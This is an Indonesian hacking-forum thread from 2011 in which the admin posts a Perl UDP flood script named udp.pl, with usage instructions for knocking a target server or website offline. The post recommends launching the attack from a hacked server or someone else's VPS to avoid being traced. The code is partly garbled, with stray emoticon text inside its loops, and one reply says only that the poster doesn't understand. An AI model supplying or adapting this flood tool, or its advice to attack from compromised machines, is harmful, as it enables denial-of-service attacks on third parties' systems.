Would you like to react to this message? Create an account in a few clicks or log in to continue.

Login

Lupa password?

Latest topics

» Setting GPRS
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:31 pm by nandazzzz

» Tools Untuk Menganalisa Suatu Virus
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:29 pm by nandazzzz

» admin masu
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:28 pm by nandazzzz

» Cara Memperkuat Sinyal Modem USB
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:27 pm by nandazzzz

» Mempercepat koneksi mozilla
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:26 pm by nandazzzz

» Memblock situs" berbau negatif
DDoS a Sever/Web EmptyTue Nov 22, 2011 2:25 pm by nandazzzz

» pengumuman buat penghuni forum
DDoS a Sever/Web EmptyThu Oct 06, 2011 3:49 pm by Nyonya oXside

» Membangun Web Server pada Jaringan Lokal (LAN)
DDoS a Sever/Web EmptyWed Oct 05, 2011 7:21 pm by farizmht

»  Perbedaan Virus Dengan Worm
DDoS a Sever/Web EmptyWed Oct 05, 2011 7:12 pm by farizmht

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Donate money

Donations will be used to buy all prizes in tournaments. If no one donates, then the only prize we can give is rank points. So please donate whenever possible, even if you don't donate much.
~ Thanks-Admin(lutfi oXside)

2 posters

    DDoS a Sever/Web

    lutfi oXside89
    lutfi oXside89
    Admin
    Admin


    Jumlah posting : 90
    Points : 175
    Reputation : 0
    Join date : 25.08.11
    Age : 28
    Lokasi : bandarlampung

    DDoS a Sever/Web Empty DDoS a Sever/Web

    Post  lutfi oXside89 Mon Sep 26, 2011 10:44 am

    Apakah itu udp.pl?

    udp.pl ada lah script sederhana yang di gunakan untuk "flooding" server/web dalam bentuk perl.

    yang harus kita sediakan untuk melakukan serangan ke website/server lain adalah shell (SSH) atau Shell inject (PHP dll..) atau bisa juga dengan menggunakan Virtual Private Server (VPS) atau Dedicated Server (DS) tapi untuk VPS & DS akan lebih baik kalo bukan milik sendiri dikarenakan faktor keamanan data kita secara pribadi maupun server yang kita miliki. bagusnya pake hacked server untuk melakukan aksi ini.
    Code:
    #!/usr/bin/perl
    #####################################################
    # udp flood.
    #
    # created: indonesia hacker team
    #
    # edited: lutfi oXside
    ######################################################

    # this file made for N3 utility & not for sell (keep opensource for all!!)
    exit(0);
    #

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "udp flood - BlackBat@MHL\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;Wink {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;Wink {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }
    Copy file ini save dalam computer dalam bentuk .pl upload ke server kamu yang akan di gunakan untuk melancarkan aksimu.

    scan web/server mana yang akan kau serang dan jika sudah mendapatkan apa yang kamu akan serang gunakan command seperti di bawah ini.

    [perl] [udp.pl] [IP] [PORT] [sending packet]

    perl <- command untuk mengexecute .pl
    udp.pl <- file yang kita upload ke dalam server sebagai bahan pokok
    IP <- IP web/server yang akan kamu attack
    PORT <- PORT dari web/server yang akan kamu attack
    Sending Packet <- jumlah yang akan ka kamu kirimkan ke web/server yang akang kamu attack

    Contoh:

    [shadow@blackbat ~]$ perl udp.txt 127.0.0.1 9999999999999999999999999999
    udp flood – BlackBat@MHL

    cukup sekian, mudah-mudahan bisa membantu kalian semua dalam mempelajari teknik dalam menjatuhkan server lawan dengan cara yang simple.

    Keep Open source all, & have fun with this script!
    farizmht
    farizmht
    good job
    good job


    Jumlah posting : 67
    Points : 91
    Reputation : 3
    Join date : 11.09.11
    Age : 28
    Lokasi : BANDAR LAMPUNG

    DDoS a Sever/Web Empty Re: DDoS a Sever/Web

    Post  farizmht Wed Oct 05, 2011 6:47 pm

    gag ngerti gan Very Happy

      Waktu sekarang Sun May 12, 2024 6:31 pm